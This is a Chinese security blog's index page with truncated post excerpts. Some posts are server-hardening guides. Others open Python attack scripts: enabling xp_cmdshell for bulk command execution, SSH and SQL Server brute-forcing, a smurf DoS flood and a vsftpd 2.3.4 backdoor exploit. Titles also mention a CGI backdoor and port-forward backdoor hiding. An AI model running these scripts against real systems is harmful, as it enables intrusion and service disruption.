网络安全
程序小黑
这个人很懒,什么都不想说。。
展开
-
TOMCAT 中间件安全加固
1、 tomcat中间件安装:①、yum install httpd* -y②、yum install tomcat* -y然后就能看到系统中多出了个端口:其中8005端口是管理口,8080是默认的tomcat页面我们可以通过访问本地8080口来判断服务是否安装成功其中下文会详细介绍如何更改tomcat的管理口和页面显示端口。其中, Tomcat配置文件所在目录:更改管理端口和服务关闭命令:1、我们进入配置文件:/etc/tomcat/server.xml这段话的意思就是“tom原创 2022-04-03 20:46:30 · 1855 阅读 · 2 评论 -
windows用户验证
在windows的NTLM用户身份验证Windows操作系统中的所有用户的账号密码都是存储在安全账号管理器(SAM)数据库中的。如果该windows开启了域服务(winserver2008以上),那么域用户的账号密码则是存储在Active Directory数据库中的。当然这个数据库也存储用户记录。每个用户账号都是有两个密码。一个LAN密码和一个Windows密码。每个密码都被加密后存储在SAM数据库中或者在Active Directory数据库中。LAN 密码基于OEM字符集,不区分大小写。Wind原创 2022-03-23 11:51:06 · 6138 阅读 · 0 评论 -
SQL Server 安全风险分析
1、 查看SQL SERVER中的所有用户:(SQL 2000或2005都可用)Select * from sysusers;2、 查看SQL SERVER服务器中所有空密码的用户:(2000/2005通用)select name,password from syslogins where password is null;3、 设置mssql只能windows本地账户登陆:4、 设置数据库日志审核:右击数据库,打开数据库属性,选择安全性,将安全性中的审计级别调成全部。5、 进行网络原创 2022-03-23 11:50:06 · 1977 阅读 · 0 评论 -
Free Float 1.0漏洞利用和EXP编写
首先使用ODB运行FTP SERVER 1.0带有缓冲区溢出漏洞的程序,然后按下F9让ODB运行我们带有漏洞的程序。我们先使用kali自带的pattern_create.rb这个脚本来生成一串用于测试缓冲区溢出的代码,以便我们在下一步测试缓冲区大小。这里我们所要使用的脚本位于/usr/share/metasplot-framework/exploit/tools下。这个目录下存在脚本pattern_create.rb文件,我们使用命令./pattern_create.rb -l 1000原创 2022-03-23 11:43:00 · 403 阅读 · 0 评论 -
vsftp2.3.4和samba3.x手工利用和加固
1、SAMBA usermap script漏洞手工利用Samba连接带有漏洞的靶机。 设置监听模块。并设置payload 为cmd/unix/reverse设置参数后运行,然后使用sambaclient连接靶机即可。2、vsftpd2.3.4手工利用smbusermap加固方法:vim /etc/samba/smb.conf注释:username map script = /etc/samba/scripts/mapusers.shvsftpd加固方法;vim /etc/vs原创 2022-03-23 11:39:11 · 1671 阅读 · 0 评论 -
使用python利用xp_cmdshell批量执行系统命令
#coding=utf-8import pymssqlimport sysfrom threading import *def connect(ip,username="sa",password="123456",database="MyDB"): conn = pymssql.connect(ip,username,password,autocommit=True,timeout=2) cursor = conn.cursor() query = "sp_configur原创 2022-03-22 10:29:53 · 1406 阅读 · 0 评论 -
使用python实现SQL server的暴力破解
import optparseimport pymssqldef connectdatabase(filename,ip,dbname): with open(filename) as f: for content in f.readlines(): allcontent = content.replace('\n','') result = allcontent.split(':') username = result[0] password = result[1]原创 2022-03-22 10:28:36 · 1500 阅读 · 0 评论 -
使用Python实现ssh的暴力破解
#!/usr/bin/python# -*- coding:utf-8 -*-import sshclassimport sysimport threadingimport timereload(sys)sys.setdefaultencoding('utf-8')__metaclass__ = typeclass Threadssh(threading.Thread): def __init__(self, func, args): threading.原创 2022-03-22 10:27:44 · 1251 阅读 · 0 评论 -
使用python利用FTP2.3.4的笑脸漏洞
首先FTP是一个文件传输协议,而且FTP是一种明文的传输协议,通过WIreshark抓包能够直接获取到FTP协议的传输内容。而在FTP2.3.4版本中,当用户名中存在:)的笑脸标志时,能够直接执行系统命令。我们如果在CTF中遇到了FTP2.3.4版本号的服务,可以使用python进行批量攻击,那我们需要编写脚本来实现这个功能,同时我们最好是使用socket来实现和FTP服务的明文通信。这个过程和使用nc命令来测试网络连通性是相同的。而在python中,利用代码如下:import timeimpor原创 2022-03-22 10:25:55 · 1391 阅读 · 1 评论 -
使用C语言寻找jmp esp的地址
需要加载user32的dll动态链接库,然后通过16进制的0xFF和0xE4来寻找jmp esp的跳转地址。#include <stdio.h>#include <windows.h>#include <stdlib.h>int main(){ BYTE *ptr; int position; HINSTANCE handle; BOOL done_flag = FALSE; handle = LoadLibrary(L"user32.dll");原创 2022-03-22 10:21:05 · 1194 阅读 · 0 评论 -
使用Python实现批量SSH弱密码检测
#!/usr/bin/python# -*- coding:utf-8 -*-import sshclassimport sysimport threadingimport timereload(sys)sys.setdefaultencoding('utf-8')__metaclass__ = typeclass Threadssh(threading.Thread): def __init__(self, func, args): threading.原创 2022-03-22 10:38:36 · 672 阅读 · 0 评论 -
使用python实现smurf攻击
from scapy.all import *from time import sleepimport _threadimport random target = '192.168.113.100'threadnum = 200def smurf(target): while True: send(IP(src=target, dst="192.168.113.255")/ICMP(), count=100, verbose=0)def attack(targ原创 2022-03-21 09:39:20 · 515 阅读 · 0 评论 -
使用python实现nmap的UDP扫描
import socketimport timefrom scapy.all import *import optparsedef tcpconnect(host,port): try: conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) conn.connect((host,port)) print '[+]%d/tcp open' % (port) conn.close() except: passdef ud原创 2022-03-21 09:38:50 · 701 阅读 · 1 评论 -
使用Python实现路由追踪脚本
from scapy.all import *import sysfrom socket import *import osfrom threading import *screenlock=Semaphore(value=500)def gsd(): print '[*]TCP routing' try: r2,unans=traceroute([sys.argv[1]],dport=[sys.argv[2]],maxttl=20) except Exc原创 2022-03-21 09:38:00 · 953 阅读 · 0 评论 -
CTF比赛中使用Python通过Mysql漏洞获取FLAG
#!/usr/bin/env pythonimport MySQLdbdef Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query原创 2022-03-21 09:36:37 · 1296 阅读 · 0 评论 -
Python学习过程的脚本记录(2)——网络脚本
使用Python实现DOS攻击(SCAPY模块)#-*- coding:UTF-8 -*-import timeimport sysimport threadingfrom scapy.all import *def start_attack(): ip_adress = "" data = "X"*1300 ip_adress = sys.argv[1] send(IP(dst=ip_adress)/ICMP()/data, verbose=False, loop=1)if原创 2022-03-21 09:26:24 · 685 阅读 · 2 评论 -
关于WEB页面处谷歌验证的接入
首先我们需要认识到什么是reCAPTCHAreCAPTCHA 验证”机制可以提供保护,避免发生由机器人导致的垃圾邮件或滥用。 通过此机制,将向用户显示一个Web 页面,其中包含Google reCAPTCHA API 提供的简单调整测试。 这些测试可以区分实际用户和机器人。 您可以将此机制添加到策略,以阻止机器人访问应用程序。由于谷歌验证需要使用谷歌服务器,在国内无法访问www.google.com,所以对于中国用户,需要使用另一个域名来实现客户端的访问。因为recaptcha是通过js导入的,是客户端原创 2022-02-15 15:01:30 · 2315 阅读 · 0 评论 -
PHP代码中PDO模块对SQL注入的防范
近些天做一个WEB应用程序的时候被人进行了SQL注入,本来是觉得,POD模块使用了参数化查询就不会存在这种被SQL注入的情况,事实告诉我,我还是太年轻了。至于SQL注入是什么,在这里就不再探讨,本质上是应用程序在编程过程中存在逻辑漏洞导致的SQL执行语句与我们想的不一致所触发的非授权访问。一般来说通过安装软/硬WAF能够较好的解决和处理这个问题,同时也需要应用程序猿在编程过程中能够有意识的避免这个问题的发生。先看我之前写的SQL查询代码,这边PDO链接的代码就不放出了,已经建立的链接使用变量$db来表示原创 2021-09-02 17:12:17 · 353 阅读 · 2 评论 -
X86_64 ABI调用约定
cdecl(代表C声明)是一种调用约定,它起源于C编程语言,许多C编译器都将它用于x86体系结构。在cdecl中,子例程参数在堆栈中传递。在EAX寄存器中返回整数值和内存地址,在ST0 x87寄存器中返回浮点值。寄存器EAX、ECX和EDX被调用保存,其余的被调用保存。当调用新函数时,x87浮点寄存器ST0到ST7必须为空(弹出或释放),而ST1到ST7在退出函数时必须为空。ST0在不用于返回值时...原创 2018-12-10 20:39:43 · 34261 阅读 · 0 评论 -
MYSQL安全创建profile
mysql中创建profile:1、通过命令打开profile功能: set profiling=1;2、使用select * from user \G;查看用户3、查询消耗4、查看某条指定命令的消耗5、设置profile表的条数:通过命令:set profiling_history_size=5;...原创 2019-01-07 13:32:10 · 29313 阅读 · 0 评论 -
解决KALI mysql无法外链的问题
首先设置MYSQL外链。允许root用户登录。然后尝试连接MYSQL梦想是美好的,现实是残酷的。原因:这里我们把plugin改成空就好了MYSQL正常能够进行外链:...原创 2019-01-07 12:59:52 · 29648 阅读 · 0 评论 -
LINUX安全加固-用户和组管理
设置密码复杂性:配置文件路径:/etc/login.defsPASS_MAX_DAYS //密码最大过期时间PASS_MIN_DAYS //密码最短过期时间PASS_MIN_LEN //密码最短长度PASS_WARN_AGE //密码到期7天前过期查看用户账户的基本信息:change -l 用户名设置用户两天内...原创 2019-01-05 17:01:07 · 31144 阅读 · 0 评论 -
Vsftpd服务安全管理--虚拟用户
虚拟用户配置1、虚拟用户:虚拟用户只能访问FTP服务器,无法登录linux系统。(/sbin/nologin)2、vsftp的服务进程为:vsftpd3、vsftpd的配置文件为:/etc/vsftpd/vsftpd.conf4、vsftpd的用户文件为:/etc/vsftpd/ftpusers5、vsftpd的用户文件是:/etc/vsftpd/user_list查看是否安装vsft...原创 2019-01-05 11:09:50 · 30974 阅读 · 0 评论 -
Samba服务安全管理-用PAM实现用户和主机的访问控制
首先samba的配置文件为:/etc/samba/smb.conf我们找到[global],并在其下加入pam obey restrictions = yes然后我们在/etc/pam.d/samba下加入:account required pam_access.so accessfile=/etc/mysmblogin在/etc下新建文件mysmblogin然后向其中写入...原创 2019-01-05 08:43:47 · 32525 阅读 · 1 评论 -
使用C++编写基于WEB CGI的后门漏洞
先上代码:#include &amp;lt;stdio.h&amp;gt;#include &amp;lt;stdlib.h&amp;gt;#include &amp;lt;string&amp;gt;using namespace std;int main(){ printf(&quot;Content-Type:text/plain;charset=utf-8\r\n\r\n&a原创 2018-12-11 12:54:52 · 32254 阅读 · 0 评论 -
linux系统下安装msf框架
命令:wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.runchmod 755 metasploit-latest-linux-installer.run./metasploit-latest-linux-installer.run等待运行结束即可。关...原创 2018-12-10 13:23:04 · 38318 阅读 · 3 评论 -
linux下/etc/rc.local的相关问题
今天在布环境的时候,遇到了一些小问题。主要是自己写了一个python的程序,并在其中使用了subprocess模块,使其产生子进程并调用我的新elf文件(linux下的二进制可执行文件)。由于我的python脚本和elf文件是放在一起的,所以我在subprocess.Popen中就直接使用了./***来执行我的elf文件,导致的结果就是我执行文件后没有得到任何返回信息。。也就是elf文件没有执行...原创 2018-12-11 12:46:19 · 33526 阅读 · 2 评论 -
Linux Shell Shock漏洞利用和实战
漏洞介绍:Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科漏洞实验环境搭建:1、 以root权限安装4.1版本的bansh。下载...原创 2019-03-01 09:37:35 · 5165 阅读 · 0 评论 -
nikto工具使用
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaoheiNIKTO相关参数:1、 -Cgidirs扫描相关CGI文件夹,传入单词“none”或者是“all”可以扫描所有CGI目录。后面可以加入/cgi-bin/来指定扫描目录。或者传入参数all扫描所有目录。2、 -config...原创 2019-03-19 18:27:46 · 1675 阅读 · 0 评论 -
使用PHP实现WEB网站登陆后台编写
使用PHP实现WEB网站登陆后台编写html页面,没加入CSS代码:&amp;lt;form action=&quot;login.php&quot; method=&quot;post&quot;&amp;gt; &amp;lt;input type=&quot;text&quot; placeholder=&quot;原创 2018-09-13 10:22:41 · 60387 阅读 · 1 评论 -
TOMCAT 中间件安全加固
TOMCAT 中间件安全加固1、 tomcat中间件安装:yum install httpd* -yyum install tomcat* -y然后就能看到系统中多出了个端口:其中8005端口是管理口,8080是默认的tomcat页面我们可以通过访问本地8080口来判断服务是否安装成功其中下文会详细介绍如何更改tomcat的管理口和页面显示端口。其中, Tomcat配置文件...原创 2019-04-28 09:26:14 · 1948 阅读 · 0 评论 -
linux中在ftp里建立虚拟用户
(Setenfore 0)首先进入主配置文件:vim /etc/vsftpd/vsftpd.conf添加如下配置: guest_enable=yes //允许来宾用户登陆 guest_username=vuser //设置虚拟用户映射成的系统用户 user_config_dir=/ftpuser //虚拟用户配置目录 allow_writeable_chr...原创 2019-04-28 09:20:51 · 425 阅读 · 0 评论 -
The Apache how to limit the visitor’s IP
First locate the context in the config “/etc/https/conf/httpd.conf” with “<Directory /var/www/html/></Directory>”.If we want to deny special IP address like “192.168.1.1” visit our websit...原创 2019-04-28 09:18:36 · 319 阅读 · 0 评论 -
SQL SERVER SECURITY CONFIG FILE
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaoheicheck the sql server versionselect @@version;list all of the user with sql serverwe can use command “select ...原创 2019-03-19 18:32:23 · 595 阅读 · 0 评论 -
How to change mysql variable
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaohei1、 set in my.cnf configureation file[mysqld]Query_chache_suze=16MMax_allow_packet=1G2、 set when starting server...原创 2019-03-19 18:31:51 · 635 阅读 · 0 评论 -
How to build the vsftpd server with TLS/SSL encryption
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaohei1、 install vsftpd servervsftpd is not secure by default.we have to do a couple of things to make the ftp server bi...原创 2019-03-19 18:31:02 · 404 阅读 · 0 评论 -
Sql server limit the extend
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaoheiopen the xp_cmdshellsp_configure ‘show advanced options’,1;reconfiguresp_configure ‘allow updates’,0 --open a...原创 2019-03-19 18:29:09 · 464 阅读 · 0 评论 -
PHP waf加固sql注入和xss注入
PHP WAF代码如下:<?php #this php page is provide the safe value.class waf{ private $input; private $pattern; private $log_path; function __construct() { session_start()...原创 2019-05-02 19:39:39 · 1712 阅读 · 0 评论 -
SQL注入练习
第一关题目链接:http://43.247.91.228:84/Less-1首先进行注入点测试。通过报错我们知道这个是mysql数据库,而且使用单引号闭合,后台语句估计是Select username from ‘{$id}’;然后我们使用order by测试数据库当前列数。接下来使用union查询来判断页面可回显的点。我们通过联合查询来查看数据库的名字以及一些信息。命令:1...原创 2018-12-20 20:39:41 · 33351 阅读 · 0 评论 -
python基于socket进行端口转发实现后门隐藏
python基于socket进行端口转发实现后门隐藏思想:用户正常浏览器访问请求通过8080端口,请求若为http请求,则正常转发到80端口保证网站正常运行。否则转发到8888端口执行系统命令。8888端口监听代码:#!/usr/bin/env pythonfrom socket import *import osHOST='127.0.0.1'PORT=8888BUFSIZE...原创 2018-10-09 20:29:33 · 49379 阅读 · 0 评论